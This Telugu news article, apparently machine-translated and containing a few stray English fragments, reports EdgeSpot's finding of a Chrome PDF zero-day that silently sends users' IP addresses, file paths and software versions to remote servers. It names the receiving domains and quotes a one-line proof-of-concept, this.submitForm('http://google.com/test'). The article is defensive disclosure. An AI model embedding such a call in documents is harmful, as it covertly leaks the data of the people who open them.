దోపిడీ గుర్తింపు సేవ ఎడ్జ్‌స్పాట్ PDF పత్రాలను దోపిడీ చేసే చమత్కారమైన Chrome సున్నా-రోజు దుర్బలత్వాన్ని కనుగొంది. Chrome లో తెరిచిన హానికరమైన PDF పత్రాలను ఉపయోగించి సున్నితమైన డేటాను సేకరించడానికి దాడి చేసేవారిని దుర్బలత్వం అనుమతిస్తుంది.

బాధితుడు గూగుల్ క్రోమ్‌లో సంబంధిత పిడిఎఫ్ ఫైల్‌లను తెరిచిన వెంటనే, హానికరమైన ప్రోగ్రామ్ యూజర్ డేటాను సేకరించడం ద్వారా నేపథ్యంలో పనిచేయడం ప్రారంభిస్తుంది.

డేటా అప్పుడు హ్యాకర్లచే నియంత్రించబడే రిమోట్ సర్వర్‌కు ఫార్వార్డ్ చేయబడుతుంది. దాడి చేసేవారు ఏ డేటాను పీల్చుకుంటున్నారో మీరు ఆలోచిస్తూ ఉండవచ్చు, వారు మీ PC లోని క్రింది డేటాను లక్ష్యంగా చేసుకుంటారు:

• IP చిరునామా
• సిస్టమ్‌లోని PDF ఫైల్ యొక్క పూర్తి మార్గం
• OS మరియు Chrome సంస్కరణలు

మాల్వేర్-రిడిన్ PDF ఫైళ్ళతో జాగ్రత్త వహించండి

PDF ఫైళ్ళను తెరవడానికి అడోబ్ రీడర్ ఉపయోగించినప్పుడు ఏమీ జరగదని మీరు ఆశ్చర్యపోవచ్చు. అదనంగా, వినియోగదారు జోక్యం లేకుండా రిమోట్ సర్వర్‌లకు డేటాను బదిలీ చేయడానికి HTTP POST అభ్యర్థనలు ఉపయోగించబడతాయి.

రీడ్‌నోటిఫైకామ్ లేదా బర్ప్‌కోలాబొరాటోర్నెట్ అనే రెండు డొమైన్‌లలో ఒకటి డేటాను స్వీకరిస్తోందని నిపుణులు గుర్తించారు.

ఎడ్జ్‌స్పాట్ గుర్తించిన నమూనాలను చాలా యాంటీవైరస్ సాఫ్ట్‌వేర్ గుర్తించలేదనే వాస్తవాన్ని పరిగణనలోకి తీసుకోవడం ద్వారా మీరు దాడి యొక్క తీవ్రతను can హించవచ్చు.

వినియోగదారుల యొక్క సున్నితమైన సమాచారాన్ని సేకరించడానికి దాడి చేసేవారు “this.submitForm ()” PDF జావాస్క్రిప్ట్ API ని ఉపయోగిస్తున్నారని నిపుణులు వెల్లడించారు.

మేము దీన్ని కనీస PoC తో పరీక్షించాము, “this.submitForm ('http://google.com/test')” వంటి సాధారణ API కాల్ Google Chrome వ్యక్తిగత డేటాను google.com కు పంపేలా చేస్తుంది.

ఈ క్రోమ్ బగ్ రెండు విభిన్న హానికరమైన పిడిఎఫ్ ఫైళ్ళ ద్వారా దోపిడీ చేయబడుతుందని నిపుణులు వాస్తవానికి కనుగొన్నారు. ఈ రెండూ వరుసగా అక్టోబర్ 2017 మరియు సెప్టెంబర్ 2018 లో పంపిణీ చేయబడ్డాయి.

ముఖ్యంగా, సేకరించిన డేటాను దాడి చేసేవారు భవిష్యత్తులో దాడులను చక్కగా ఉపయోగించుకోవచ్చు. రీడ్‌నోటిఫై యొక్క పిడిఎఫ్ ట్రాకింగ్ సేవను ఉపయోగించి మొదటి బ్యాచ్ ఫైళ్లు సంకలనం చేయబడిందని నివేదికలు సూచిస్తున్నాయి.

వినియోగదారు వీక్షణలను ట్రాక్ చేయడానికి వినియోగదారులు సేవను ఉపయోగించుకోవచ్చు. ఎడ్జ్‌స్పాట్ రెండవ పిడిఎఫ్ ఫైళ్ల స్వభావానికి సంబంధించి ఎలాంటి వివరాలను పంచుకోలేదు.

ఎలా రక్షణగా ఉండాలి

ఎక్స్‌ప్లోయిట్ డిటెక్షన్ సర్వీస్ ఎడ్జ్‌స్పాట్ వినియోగదారులను క్రోమ్ వినియోగదారులను సంభావ్య ప్రమాదాల గురించి అప్రమత్తం చేయాలనుకుంది ఎందుకంటే సమీప భవిష్యత్తులో ప్యాచ్ విడుదల అవుతుందని is హించలేదు.

ఎడ్జ్‌స్పాట్ గత ఏడాది దుర్బలత్వం గురించి గూగుల్‌కు నివేదించింది మరియు ఏప్రిల్ చివరిలో ప్యాచ్‌ను విడుదల చేస్తామని కంపెనీ హామీ ఇచ్చింది. H

ఏదేమైనా, ప్రత్యామ్నాయ PDF రీడర్ అనువర్తనాన్ని ఉపయోగించి స్వీకరించిన PDF పత్రాలను స్థానికంగా చూడటం ద్వారా సమస్యకు తాత్కాలిక పరిష్కారాన్ని ఉపయోగించడాన్ని మీరు పరిగణించవచ్చు.

ప్రత్యామ్నాయంగా, మీరు మీ సిస్టమ్‌లను ఇంటర్నెట్ నుండి డిస్‌కనెక్ట్ చేయడం ద్వారా Chrome లో మీ PDF పత్రాలను కూడా తెరవవచ్చు. ఇంతలో, మీరు ఏప్రిల్ 23 న విడుదల చేయబోయే Chrome 74 నవీకరణ కోసం వేచి ఉండవచ్చు.